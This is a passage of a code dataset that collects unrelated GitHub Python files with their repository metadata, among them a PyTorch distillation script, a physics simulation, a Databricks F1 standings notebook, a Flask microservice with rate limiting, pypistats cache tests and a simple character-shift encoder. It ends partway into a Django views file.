torchvision.datasets.MNIST(root='./data', \n train=False, \n transform=transforms.ToTensor(), \n download=True)\n val_loader = torch.utils.data.DataLoader(dataset=val_dataset, \n batch_size=batch_size, \n shuffle=False,\n num_workers=4)\n return val_loader\n\n\n\n#check gpu\n#device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n#setup\ntorch.set_float32_matmul_precision('high')\n\n# initialize models\nteacher = TeacherNet()\nstudent = StudentNet()\n\n# initialize trainer\ntrainer = pl.Trainer(max_epochs=5, accelerator=\"cpu\", devices='auto')\n\n# initialize knowledge distillation module\nkd_module = KnowledgeDistillation(teacher, student)\n\n# train the student network using knowledge distillation\ntrainer.fit(kd_module)\n\n\n","repo_name":"KhanhNguyen4999/Speech-Enhancement-CLSKD","sub_path":"backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"5135518319","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 24 18:56:02 2018\n\n@author: michael\n\"\"\"\n\nimport global_var as var\nimport numpy as np\nfrom os import listdir\n\ndef list_files(directory, extension):\n return (f for f in listdir(directory) if f.endswith('.' + extension))\n\ndef find_nearest(array, value):\n idx = (np.abs(array - value)).argmin()\n return idx\n\ndef B_field(R):\n \"\"\" Returns B_field at location R as described an idealized magnetic dipole.\"\"\"\n R_o = np.array([0, 0, -.01])\n r = np.subtract(R, R_o)\n r_norm = np.linalg.norm(r)\n B_1 = (3*np.dot(var.mag,r)*r)/(r_norm**5)\n B_2 = var.mag/(r_norm**3)\n B = np.subtract(B_1, B_2)*10**-7\n \n return B\n\ndef mult_Q(P, R, coeff=False):\n \"\"\" Performs quaternionic multiplicatione between P and R. \"\"\"\n \n if coeff == False:\n coeff = 1.0\n \n u0 = coeff*(P[0]*R[0] - np.dot(P[1:4],R[1:4]))\n u = coeff*np.add(np.add(P[0]*R[1:4],R[0]*P[1:4]),np.cross(P[1:4],R[1:4]))\n \n Q = np.array([u0, u[0], u[1], u[2]])\n return Q\n \ndef conj_Q(Q):\n \"\"\" Returns the complex conjugate of Q.\"\"\"\n Q_new = np.array([Q[0], -Q[1], -Q[2], -Q[3]])\n return Q_new \n\ndef integrate_flight(t, InCon, Prams):\n \"\"\" Track grain through phase space during flight.\n\n Parameters\n ----------\n InCon : array\n phase space of grain\n -position : {0:3} \n -velocity : {3:6}\n -quaternion : {6:10}\n -quaternion derivative : {10:14}\n \n Prams : dict\n system parameters\n 'length' : length of grain\n 'mass' : mass of grain \n 'charge' : charge on grain\n 'magnetic' : magnetic moment of grain\n 'momentx' : moment of inertia in X\n 'momentz' : moment of inertia in Z\n \"\"\"\n r = InCon[0:3]\n v = InCon[3:6]\n quat = InCon[6:10]\n quat_norm = np.linalg.norm(quat)\n if (quat_norm > 1.00001) or (quat_norm < 0.99999):\n quat = quat/quat_norm \n quat_deriv = InCon[10:14]\n \n B = B_field(r)\n\n # Forces acting on the center of mass\n Acc_g = np.array([0,0,-var.g])\n Acc_b = (Prams['charge']/Prams['mass']) * np.cross(v, B)\n Acc = np.add(Acc_g, Acc_b)\n\n # Rotation\n B_body = mult_Q(conj_Q(quat), mult_Q(np.array([0.0, B[0], B[1], B[2]]),quat))[1:4]\n torq = Prams['magnetic']*np.array([-B_body[1], B_body[0], 0])\n \n angVel = 2*mult_Q(conj_Q(quat), quat_deriv)[1:4]\n angMom = np.array([Prams['momentx']*angVel[0], Prams['momentx']*angVel[1], Prams['momentz']*angVel[2]])\n angRot = np.cross(angVel, angMom)\n \n tRot = np.subtract(torq, angRot)\n moment_inv = 1./Prams['momentx']\n tRot_Q = np.array([0.0, moment_inv*tRot[0], moment_inv*tRot[1], tRot[2]/Prams['momentz']])\n \n ddQ_1 = mult_Q(quat_deriv, mult_Q(conj_Q(quat),quat_deriv))\n ddQ_2 = 0.5*mult_Q(quat, tRot_Q)\n ddQ = np.add(ddQ_1, ddQ_2)\n \n # Change rates\n deriv = [quat_deriv, ddQ]\n deriv = np.insert(deriv, 0, Acc)\n deriv = np.insert(deriv, 0, v) \n return deriv\n\ndef integrate_impact(t, InCon, Prams):\n \"\"\" Track grain through phase space during its impact with the surface.\n \n Parameters\n ----------\n t : float\n time step used by integrator (defined in SciPy module)\n \n InCon : array\n phase space of grain\n -quaternion = {0:4}\n -quaternion derivative = {4:8}\n \n Prams : dict\n system parameters\n 'momentx' : moment of inertia in x\n 'momentz' : moment of inertia in z\n 'accel' : acceleration on center of mass\n \"\"\"\n \n quat = InCon[0:4]\n quat_norm = np.linalg.norm(quat)\n if (quat_norm > 1.00001) or (quat_norm < 0.99999):\n quat = quat/quat_norm \n quat_deriv = InCon[4:8] \n \n accel_body = mult_Q(conj_Q(quat), mult_Q(Prams['accel'], quat))\n torq = np.array([-accel_body[2], accel_body[1], 0.0])\n \n angVel = 2*mult_Q(conj_Q(quat), quat_deriv)[1:4]\n angMom = np.array([Prams['momentx']*angVel[0], Prams['momentx']*angVel[1], Prams['momentz']*angVel[2]])\n angRot = np.cross(angVel, angMom)\n \n tRot = np.subtract(torq, angRot)\n momentx_inv = 1./Prams['momentx']\n tRot_Q = np.array([0.0, momentx_inv*tRot[0], momentx_inv*tRot[1], tRot[2]/Prams['momentz']])\n \n q1 = mult_Q(quat_deriv, mult_Q(conj_Q(quat),quat_deriv))\n q2 = 0.5*mult_Q(quat, tRot_Q)\n quat_deriv_deriv = np.add(q1, q2)\n \n return np.insert(quat_deriv_deriv, 0, quat_deriv) ","repo_name":"mige4603/Swirl-Simulation","sub_path":"IDQuat/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72303273474","text":"import numpy as np\nimport imgs,preproc.rescale\n\ndef projection(in_path,out_path):\n proj_x=get_projection(dim=0)\n proj_y=get_projection(dim=1)\n def full_projection(frames):\n x_frames=proj_x(frames)\n y_frames=proj_y(frames)\n return [np.concatenate([proj_x,proj_y],axis=0)\n for proj_x,proj_y in zip(x_frames,y_frames)]\n imgs.transform(in_path,out_path,full_projection,False)\n\t\ndef raw_projection(in_path,out_path,dim=0):\n helper=get_helper(dim)\n imgs.transform(in_path,out_path,helper,False)\n\ndef get_projection(dim=0):\n proj_x=get_helper(dim)\n def smart_proj(frames):\n x_frames=proj_x(frames)\n x_frames=preproc.rescale.smooth_proj(x_frames)\n x_frames=preproc.rescale.scale(x_frames)\n return x_frames\n return smart_proj\n\ndef get_helper(dim=0):\n def proj_helper(frames):\n all_points=[ to_points(frame_i) for frame_i in frames]\n extr=np.array([np.amax(points_i,axis=0) for points_i in all_points])\n extr_glob=np.amax(extr,axis=0)\n max_x,max_y=extr_glob[dim],extr_glob[2]\n new_frames=[]\n for points_i in all_points:\n frame_i=np.zeros((max_x+5,max_y+5))\n for point_ij in points_i:\n x_j,y_j=int(point_ij[dim]),int(point_ij[2])\n frame_i[x_j][y_j]=200.0\n new_frames.append(frame_i)\n return new_frames\n return proj_helper\n\ndef to_points(frame_i):\n points=[]\n for cord_i in np.array(np.nonzero(frame_i)).T:\n x_i,y_i=cord_i[0],cord_i[1]\n points.append([x_i,y_i,frame_i[x_i][y_i] ])\n return np.array(points)","repo_name":"tjacek/res_ensemble","sub_path":"preproc/proj.py","file_name":"proj.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2498435867","text":"# Databricks notebook source\n# MAGIC %run \"../includes/configuration\"\n\n# COMMAND ----------\n\n# MAGIC %run \"../includes/common_functions\"\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import col, sum, count, when\nfrom pyspark.sql.functions import sum, when, col, count, desc, rank\nfrom pyspark.sql.window import Window \n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_data_source\", \"\")\nv_data_source = dbutils.widgets.get(\"p_data_source\")\n\ndbutils.widgets.text(\"p_file_date\", \"2021-03-21\")\nv_file_date = dbutils.widgets.get(\"p_file_date\")\n\n# COMMAND ----------\n\nrace_results = spark.read.format(\"delta\").load(f\"{presentation_folder_path}/race_results\") \\\n.filter(f\"file_date = '{v_file_date}'\")\n\n\n# COMMAND ----------\n\nrace_year_list = df_column_to_list(race_results, 'race_year')\n\n# COMMAND ----------\n\nrace_results_df = spark.read.format(\"delta\").load(f\"{presentation_folder_path}/race_results\") \\\n.filter(col(\"race_year\").isin(race_year_list))\n\n# COMMAND ----------\n\nconstructors = race_results.groupBy(\"team\", \"race_year\") \\\n .agg(\n sum(col(\"points\")).alias(\"total_points\"),\n count(when(col(\"position\") == 1, True)).alias(\"Wins\")\n )\n\n\n# COMMAND ----------\n\nconstructor_rank_spec = Window.partitionBy(\"race_year\").orderBy(desc(\"total_points\"), desc(\"wins\"))\nfinal_df = constructors.withColumn(\"rank\", rank().over(constructor_rank_spec))\n\n\n# COMMAND ----------\n\ndisplay(final_df)\n\n# COMMAND ----------\n\nmerge_condition = \"tgt.team = src.team AND tgt.race_year = src.race_year\"\nmerge_delta_data(\n input_df=final_df,\n db_name=\"f1_presentation\",\n table_name=\"constructor_standings\",\n folder_path=presentation_folder_path,\n merge_condition=merge_condition,\n partition_column=\"race_year\",\n )\n\n# COMMAND ----------\n\n","repo_name":"LouisYC123/azure-databricks-f1","sub_path":"workspace/Formula1/transformations/constructor_standings.py","file_name":"constructor_standings.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72476113155","text":"# work\nimport unicodecsv as csv\n# import csv\nimport ujson as json\nimport gzip\nimport sys\nfrom tqdm import tqdm\n\n\ndef validate_to_set(x):\n if x is None:\n return set()\n elif isinstance(x, (tuple, list)):\n return set(x)\n elif isinstance(x, str):\n return set([x])\n return -1\n\n\ndef main(in_path, out_path, delim=',', keep_fields=None, skip_fields=None):\n \"\"\"\n :param str in_path:\n :param str out_path:\n :param str delim:\n :param list|str keep_fields:\n :param list|str skip_fields:\n \"\"\"\n keep_fields = validate_to_set(keep_fields)\n if keep_fields == -1:\n return\n skip_fields = validate_to_set(skip_fields)\n if skip_fields == -1:\n return\n\n fmt = in_path.split('.')[-1]\n if fmt == 'gz':\n open_to_use = gzip.open\n else:\n open_to_use = open\n\n # Read the file once to get a list of all keep fields\n # skip if a set list of keep fields is defined\n line_count = None\n if len(keep_fields) == 0:\n line_count = 0\n for line in tqdm(open_to_use(in_path)):\n keep_fields.update(list(json.loads(line).keys()))\n line_count += 1\n\n keep_fields.difference_update(skip_fields)\n\n # force alphabetization\n keep_list = sorted(keep_fields)\n\n with open(out_path, 'w') as outfile:\n writer = csv.writer(outfile, delimiter=delim)\n writer.writerow(keep_list)\n for line in tqdm(open_to_use(in_path), total=line_count):\n jsn = json.loads(line)\n writer.writerow([jsn[x] if x in jsn else '' for x in keep_list])\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print('Usage: python jsonlines2csv.py ]')\n sys.exit(0)\n main(sys.argv[1], sys.argv[2], skip_fields=['content'])\n\n# python jl_csv_github.py /Users/pz/Desktop/ds558/pythoncode/project/data_cleaning/link_data/link_la.jl csv_la.csv","repo_name":"ZepeiZhao/APT_renting_platform_Knowledge_Graph","sub_path":"data_cleaning/jlTocsv/jl_csv_github.py","file_name":"jl_csv_github.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"11598848569","text":"#This code is developed based on the code presented for BookInfo code.\n\nfrom __future__ import print_function\nfrom flask_bootstrap import Bootstrap\nfrom flask import Flask, request, session, render_template, redirect, url_for, abort\nfrom flask import _request_ctx_stack as stack\nfrom jaeger_client import Tracer, ConstSampler\nfrom jaeger_client.reporter import NullReporter\nfrom jaeger_client.codecs import B3Codec\nfrom opentracing.ext import tags\nfrom opentracing.propagation import Format\nfrom opentracing_instrumentation.request_context import get_current_span, span_in_context\nimport simplejson as json\nimport requests\nimport sys\nfrom json2html import *\nimport logging\nimport requests\nimport os\nimport asyncio\nimport random\nimport time\n\n# These two lines enable debugging at httplib level (requests->urllib3->http.client)\n# You will see the REQUEST, including HEADERS and DATA, and RESPONSE with HEADERS but without DATA.\n# The only thing missing will be the response.body which is not logged.\ntry:\n import http.client as http_client\nexcept ImportError:\n # Python 2\n import httplib as http_client\nhttp_client.HTTPConnection.debuglevel = 1\n\napp = Flask(__name__)\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\nrequests_log = logging.getLogger(\"requests.packages.urllib3\")\nrequests_log.setLevel(logging.DEBUG)\nrequests_log.propagate = True\napp.logger.addHandler(logging.StreamHandler(sys.stdout))\napp.logger.setLevel(logging.DEBUG)\n\n# Set the secret key to some random bytes. Keep this really secret!\napp.secret_key = b'_5#y2L\"F4Q8z\\n\\xec]/'\n\nBootstrap(app)\n\nservicesDomain = \"\" if (os.environ.get(\"SERVICES_DOMAIN\") is None) else \".\" + os.environ.get(\"SERVICES_DOMAIN\")\nfetchHostname = \"newfetch\" if (os.environ.get(\"FETCH_HOSTNAME\") is None) else os.environ.get(\"FETCH_HOSTNAME\")\n\nflood_factor = 0 if (os.environ.get(\"FLOOD_FACTOR\") is None) else int(os.environ.get(\"FLOOD_FACTOR\"))\n\nfetch = {\n \"name\": \"http://{0}{1}:9090\".format(fetchHostname, servicesDomain),\n \"endpoint\": \"newfetch\",\n \"children\": []\n}\n\nsearchpage = {\n \"name\": \"http://{0}{1}:9090\".format(fetchHostname, servicesDomain),\n \"endpoint\": \"newfetch\",\n \"children\": [fetch]\n}\n\nservice_dict = {\n \"newsearchpage\": searchpage,\n \"newfetch\": fetch,\n}\n\ncity_rate_limit = {\n \"counter\" : 0,\n \"stamp\" : time.time(),\n \"threshold\" : 5\n}\n\nbooks_rate_limit = {\n \"counter\" : 0,\n \"stamp\" : time.time(),\n \"threshold\" : 5\n}\n\n\n# A note on distributed tracing:\n#\n# Although Istio proxies are able to automatically send spans, they need some\n# hints to tie together the entire trace. Applications need to propagate the\n# appropriate HTTP headers so that when the proxies send span information, the\n# spans can be correlated correctly into a single trace.\n#\n# To do this, an application needs to collect and propagate headers from the\n# incoming request to any outgoing requests. The choice of headers to propagate\n# is determined by the trace configuration used. See getForwardHeaders for\n# the different header options.\n#\n# This example code uses OpenTracing (http://opentracing.io/) to propagate\n# the 'b3' (zipkin) headers. Using OpenTracing for this is not a requirement.\n# Using OpenTracing allows you to add application-specific tracing later on,\n# but you can just manually forward the headers if you prefer.\n#\n# The OpenTracing example here is very basic. It only forwards headers. It is\n# intended as a reference to help people get started, eg how to create spans,\n# extract/inject context, etc.\n\n# A very basic OpenTracing tracer (with null reporter)\ntracer = Tracer(\n one_span_per_rpc=True,\n service_name='newsearchpage',\n reporter=NullReporter(),\n sampler=ConstSampler(decision=True),\n extra_codecs={Format.HTTP_HEADERS: B3Codec()}\n)\n\ndef trace():\n '''\n Function decorator that creates opentracing span from incoming b3 headers\n '''\n def decorator(f):\n def wrapper(*args, **kwargs):\n request = stack.top.request\n try:\n # Create a new span context, reading in values (traceid,\n # spanid, etc) from the incoming x-b3-*** headers.\n span_ctx = tracer.extract(\n Format.HTTP_HEADERS,\n dict(request.headers)\n )\n # Note: this tag means that the span will *not* be\n # a child span. It will use the incoming traceid and\n # spanid. We do this to propagate the headers verbatim.\n rpc_tag = {tags.SPAN_KIND: tags.SPAN_KIND_RPC_SERVER}\n span = tracer.start_span(\n operation_name='op', child_of=span_ctx, tags=rpc_tag\n )\n except Exception as e:\n # We failed to create a context, possibly due to no\n # incoming x-b3-*** headers. Start a fresh span.\n # Note: This is a fallback only, and will create fresh headers,\n # not propagate headers.\n span = tracer.start_span('op')\n with span_in_context(span):\n r = f(*args, **kwargs)\n return r\n wrapper.__name__ = f.__name__\n return wrapper\n return decorator\n\ndef getForwardHeaders(request):\n headers = {}\n\n # x-b3-*** headers can be populated using the opentracing span\n span = get_current_span()\n carrier = {}\n tracer.inject(\n span_context=span.context,\n format=Format.HTTP_HEADERS,\n carrier=carrier)\n\n headers.update(carrier)\n\n # We handle other (non x-b3-***) headers manually\n if 'user' in session:\n headers['end-user'] = session['user']\n\n # Keep this in sync with the headers in details and reviews.\n incoming_headers = [\n # All applications should propagate x-request-id. This header is\n # included in access log statements and is used for consistent trace\n # sampling and log sampling decisions in Istio.\n 'x-request-id',\n\n # Lightstep tracing header. Propagate this if you use lightstep tracing\n # in Istio (see\n # https://istio.io/latest/docs/tasks/observability/distributed-tracing/lightstep/)\n # Note: this should probably be changed to use B3 or W3C TRACE_CONTEXT.\n # Lightstep recommends using B3 or TRACE_CONTEXT and most application\n # libraries from lightstep do not support x-ot-span-context.\n 'x-ot-span-context',\n\n # Datadog tracing header. Propagate these headers if you use Datadog\n # tracing.\n 'x-datadog-trace-id',\n 'x-datadog-parent-id',\n 'x-datadog-sampling-priority',\n\n # W3C Trace Context. Compatible with OpenCensusAgent and Stackdriver Istio\n # configurations.\n 'traceparent',\n 'tracestate',\n\n # Cloud trace context. Compatible with OpenCensusAgent and Stackdriver Istio\n # configurations.\n 'x-cloud-trace-context',\n\n # Grpc binary trace context. Compatible with OpenCensusAgent nad\n # Stackdriver Istio configurations.\n 'grpc-trace-bin',\n\n # b3 trace headers. Compatible with Zipkin, OpenCensusAgent, and\n # Stackdriver Istio configurations. Commented out since they are\n # propagated by the OpenTracing tracer above.\n # 'x-b3-traceid',\n # 'x-b3-spanid',\n # 'x-b3-parentspanid',\n # 'x-b3-sampled',\n # 'x-b3-flags',\n\n # Application-specific headers to forward.\n 'user-agent',\n ]\n # For Zipkin, always propagate b3 headers.\n # For Lightstep, always propagate the x-ot-span-context header.\n # For Datadog, propagate the corresponding datadog headers.\n # For OpenCensusAgent and Stackdriver configurations, you can choose any\n # set of compatible headers to propagate within your application. For\n # example, you can propagate b3 headers or W3C trace context headers with\n # the same result. This can also allow you to translate between context\n # propagation mechanisms between different applications.\n\n for ihdr in incoming_headers:\n val = request.headers.get(ihdr)\n if val is not None:\n headers[ihdr] = val\n\n return headers\n\n@app.route('/login', methods=['POST'])\ndef login():\n user = request.values.get('username')\n response = app.make_response(redirect(request.referrer))\n session['user'] = user\n return response\n\n\n@app.route('/logout', methods=['GET'])\ndef logout():\n response = app.make_response(redirect(request.referrer))\n session.pop('user', None)\n return response\n\n\n# The UI:\n@app.route('/')\n@app.route('/index.html')\ndef index():\n \"\"\" Display productpage with normal user and test user buttons\"\"\"\n global searchpage\n\n table = json2html.convert(json=json.dumps(searchpage),\n table_attributes=\"class=\\\"table table-condensed table-bordered table-hover\\\"\")\n\n return render_template('index.html', serviceTable=table)\n\n\n@app.route('/health')\ndef health():\n return 'Product page is healthy'\n\n@app.route('/api/v1/')\ndef Forough():\n return 'I Love U Forough :*'\n\n@app.route('/books')\n@trace()\ndef front_books():\n\n global books_rate_limit\n\n rate_limit_stamp = time.time()\n\n if (rate_limit_stamp % 1 == 0) or (rate_limit_stamp - books_rate_limit[\"stamp\"] > 1):\n books_rate_limit[\"counter\"] = 0\n books_rate_limit[\"stamp\"] = rate_limit_stamp\n\n if (books_rate_limit[\"counter\"] > books_rate_limit[\"threshold\"]):\n abort(429)\n books_rate_limit[\"counter\"] += 1\n\n product_id = random.randint(1, 800)\n headers = getForwardHeaders(request)\n user = session.get('user', '')\n product = getFetch(product_id)\n fetchStatus, fetch = getFetchedPoints_books(product_id,headers)\n return render_template(\n 'searchpage.html',\n # detailsStatus=detailsStatus,\n fetchStatus=fetchStatus,\n product=product,\n # details=details,\n fetch=fetch,\n user=user)\n\n@app.route('/city')\n@trace()\ndef front_city():\n\n global city_rate_limit\n\n rate_limit_stamp = time.time()\n\n if (rate_limit_stamp % 1 == 0) or (rate_limit_stamp - city_rate_limit[\"stamp\"]>1):\n city_rate_limit[\"counter\"] = 0\n city_rate_limit[\"stamp\"] = rate_limit_stamp\n\n if (city_rate_limit[\"counter\"] > city_rate_limit[\"threshold\"]):\n abort(429)\n city_rate_limit[\"counter\"] += 1\n product_id = random.randint(1000000,10000000)\n headers = getForwardHeaders(request)\n user = session.get('user', '')\n product = getFetch(product_id)\n fetchStatus, fetch = getFetchedPoints_city(product_id,headers)\n return render_template(\n 'searchpage.html',\n fetchStatus=fetchStatus,\n product=product,\n fetch=fetch,\n user=user)\n\n\ndef getFetch(product_id):\n products = getProducts()\n if product_id + 1 > len(products):\n return None\n else:\n return products[product_id]\n\n# The API:\n@app.route('/api/v1/search')\ndef searchapi():\n return json.dumps(getProducts()), 200, {'Content-Type': 'application/json'}\n\n\n@app.route('/api/v1/newfetch/books/')\n@trace()\ndef fetchapi_book(points):\n headers = getForwardHeaders(request)\n status, fetches = getFetchedPoints_books(points, headers)\n return json.dumps(fetches), status, {'Content-Type': 'application/json'}\n\n@app.route('/api/v1/newfetch/city/')\n@trace()\ndef fetchapi_city(points):\n headers = getForwardHeaders(request)\n status, fetches = getFetchedPoints_city(points, headers)\n return json.dumps(fetches), status, {'Content-Type': 'application/json'}\n\n@app.route('/ratecity/')\n@trace()\ndef rate_city(ratelimitc):\n city_rate_limit[\"threshold\"] = int(float(ratelimitc))\n statecode = 200\n status = 200\n return json.dumps(ratelimitc), status, {'Content-Type': 'application/json'}\n\n@app.route('/ratebook/')\n@trace()\ndef rate_books(ratelimitb):\n books_rate_limit[\"threshold\"] = int(float(ratelimitb))\n statecode = 200\n status = 200\n return json.dumps(ratelimitb), status, {'Content-Type': 'application/json'}\n\n# Data providers:\ndef getProducts():\n return [\n {\n 'points': 123\n }\n ]\n\ndef getFetchedPoints_books(fetchpoints, headers):\n for _ in range(1):\n try:\n url = fetch['name'] + \"/\" + fetch['endpoint'] + \"/books/\" + str(fetchpoints)\n res = requests.get(url, headers=headers, timeout=20.0)\n except BaseException:\n res = None\n if res and res.status_code == 200:\n return 200, res.json()\n status = res.status_code if res is not None and res.status_code else 500\n return status, {'error': 'Sorry, the information for this book is not available.'}\n\ndef getFetchedPoints_city(fetchpoints, headers):\n\n for _ in range(1):\n try:\n url = fetch['name'] + \"/\" + fetch['endpoint'] + \"/city/\" + str(fetchpoints)\n res = requests.get(url, headers=headers, timeout=20.0)\n except BaseException:\n res = None\n if res and res.status_code == 200:\n return 200, res.json()\n status = res.status_code if res is not None and res.status_code else 500\n return status, {'error': 'Sorry, the information for this city is not available.'}\n\n\nclass Writer(object):\n def __init__(self, filename):\n self.file = open(filename, 'w')\n\n def write(self, data):\n self.file.write(data)\n\n def flush(self):\n self.file.flush()\n\n\nif __name__ == '__main__':\n\n if len(sys.argv) < 2:\n logging.error(\"usage: %s port\" % (sys.argv[0]))\n sys.exit(-1)\n\n p = int(sys.argv[1])\n logging.info(\"start at port %s\" % (p))\n # Python does not work on an IPv6 only host\n # https://bugs.python.org/issue10414\n app.run(host='0.0.0.0', port=p, debug=True, threaded=True)\n","repo_name":"foroughsh/Framework-for-dynamically-meeting-performanc-objectives","sub_path":"Services_on_testbed/front_node/searchpage.py","file_name":"searchpage.py","file_ext":"py","file_size_in_byte":13805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"171400253","text":"import json\nimport sys\nimport datetime\n\ndef help():\n msg = 'epoch-converter help\\n'\n msg += '\\t Muestra la ayuda de la función\\n'\n msg += 'epoch-converter epoch VALUE\\n'\n msg += '\\t Convierte VALUE (epoch timestamp) a formato fecha\\n'\n msg += 'epoch-converter date VALUE\\n'\n msg += '\\t Convierte VALUE (fecha en formato MM/DD/YYYY-HH:MM:SS) a un epoch timestamp\\n'\n return msg, 200\n\ndef epoch2date(value):\n try:\n ts = datetime.datetime.fromtimestamp(int(value))\n return ts.strftime('%m/%d/%Y-%H:%M:%S'), 200\n except:\n return 'The value must be an integer', 400\n\ndef date2epoch(value):\n try:\n date, time = value.split('-')\n month,day,year = [int(i) for i in date.split('/')]\n h,m,s = [int(i) for i in time.split(':')]\n\n ts = int(datetime.datetime(year, month, day, h, m, s).timestamp())\n return f'{ts}', 200\n except ValueError as e:\n return str(e), 400\n \ndef handle_output(res):\n msg, code = res\n return {\n 'statusCode': code,\n 'body': msg\n }\n\n\ndef lambda_handler(event, context):\n\n args = event.split()\n print(args)\n\n if not args:\n return handle_output(('There are no arguments', 400))\n\n if args[0] == 'help':\n return handle_output(help())\n\n if len(args) < 2:\n msg = 'Is ncessary provide the format and the value to convert'\n return handle_output((msg, 400))\n \n if args[0] == 'epoch':\n return handle_output(epoch2date(args[1]))\n elif args[0] == 'date':\n return handle_output(date2epoch(args[1]))\n else:\n return handle_output(('Format/operation not supported', 400))\n\n","repo_name":"miavisa/SD","sub_path":"tareas/faas/epoch-converter/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8429057349","text":"\"\"\"\nUnit tests for pypistats cache\n\"\"\"\nimport tempfile\nfrom pathlib import Path\n\nimport respx\nfrom freezegun import freeze_time\n\nimport pypistats\n\n\nclass TestPypiStatsCache:\n def setup_method(self) -> None:\n # Choose a new cache dir that doesn't exist\n self.original_cache_dir = pypistats.CACHE_DIR\n self.temp_dir = tempfile.TemporaryDirectory()\n pypistats.CACHE_DIR = Path(self.temp_dir.name) / \"pypistats\"\n\n def teardown_method(self) -> None:\n # Reset original\n pypistats.CACHE_DIR = self.original_cache_dir\n\n @freeze_time(\"2018-12-26\")\n def test__cache_filename(self) -> None:\n # Arrange\n url = \"https://pypistats.org/api/packages/pip/recent\"\n\n # Act\n out = pypistats._cache_filename(url)\n\n # Assert\n assert str(out).endswith(\n \"2018-12-26-https-pypistats-org-api-packages-pip-recent.json\"\n )\n\n def test__load_cache_not_exist(self) -> None:\n # Arrange\n filename = Path(\"file-does-not-exist\")\n\n # Act\n data = pypistats._load_cache(filename)\n\n # Assert\n assert data == {}\n\n def test__load_cache_bad_data(self) -> None:\n # Arrange\n with tempfile.NamedTemporaryFile(delete=False) as f:\n f.write(b\"Invalid JSON!\")\n\n # Act\n data = pypistats._load_cache(Path(f.name))\n\n # Assert\n assert data == {}\n\n def test_cache_round_trip(self) -> None:\n # Arrange\n filename = pypistats.CACHE_DIR / \"test_cache_round_trip.json\"\n data = \"test data\"\n\n # Act\n pypistats._save_cache(filename, data)\n new_data = pypistats._load_cache(filename)\n\n # Tidy up\n filename.unlink()\n\n # Assert\n assert new_data == data\n\n def test__clear_cache(self) -> None:\n # Arrange\n # Create old cache file\n cache_file = pypistats.CACHE_DIR / \"2018-11-26-old-cache-file.json\"\n pypistats._save_cache(cache_file, data={})\n assert cache_file.exists()\n\n # Act\n pypistats._clear_cache()\n\n # Assert\n assert not cache_file.exists()\n\n @respx.mock\n def test_subcommand_with_cache(self) -> None:\n # Arrange\n package = \"pip\"\n mocked_url = \"https://pypistats.org/api/packages/pip/overall\"\n mocked_response = \"\"\"{\n \"data\": [\n {\"category\": \"without_mirrors\", \"date\": \"2018-11-01\", \"downloads\": 2295765}\n ],\n \"package\": \"pip\",\n \"type\": \"overall_downloads\"\n }\"\"\"\n expected_output = \"\"\"\n| category | downloads |\n|:----------------|----------:|\n| without_mirrors | 2,295,765 |\n\nDate range: 2018-11-01 - 2018-11-01\n\"\"\"\n\n # Act\n respx.get(mocked_url).respond(content=mocked_response)\n # First time to save to cache\n pypistats.overall(package)\n # Second time to read from cache\n output = pypistats.overall(package, format=\"md\")\n\n # Assert\n assert output.strip() == expected_output.strip()\n","repo_name":"hugovk/pypistats","sub_path":"tests/test_pypistats_cache.py","file_name":"test_pypistats_cache.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"61"} +{"seq_id":"12194947124","text":"#my_str = \"hello world\"\n#my_str_as_bytes = str.encode(my_str)\n#print(type(my_str_as_bytes) )# ensure it is byte representation\n#my_decoded_str = my_str_as_bytes.decode()\n#type(my_decoded_str) # ensure it is string representation\n#print(my_str_as_bytes)\n\n#print(ord(\"b\"))#ASCII(only character) - ord function\n#print(ord(\"A\"))\n\n# Add each character, and it's ordinal, of user's text input, to two lists\n#s = input(\"Enter value: \") # this line requires Python 3.x, use raw_input() instead of input() in Python 2.x\n\n#l1=[c for c in s] # in Python, a string is just a sequence, so we can iterate over it!\n#l2=[ord(c) for c in s]\n\n#print(l1)\n#print(l2)\ndef encrypt(message,shift_key):\n\n result=''\n print('leangth :',len(message))\n for i in range(len(message)):\n letter=message[i]\n\n if letter.isupper():\n result+=chr((ord(letter)+shift_key-65)%26+65)\n else:\n result += chr((ord(letter) + shift_key - 95) % 26 + 95)\n return result\n\n\n","repo_name":"savithri3317/Hybrid-encryption","sub_path":"GUI/Encoding.py","file_name":"Encoding.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32611764609","text":"from .models import RiderProfile, Profile, Codes, Merchandise, MerchandiseOrder, ClubEvent, SignupPromotion\nimport json\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.conf import settings\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.core.mail import send_mail, send_mass_mail, EmailMultiAlternatives, EmailMessage\nfrom .models import Event\nfrom django.http import JsonResponse, HttpResponsePermanentRedirect, HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render, redirect\nfrom events.forms import (\n 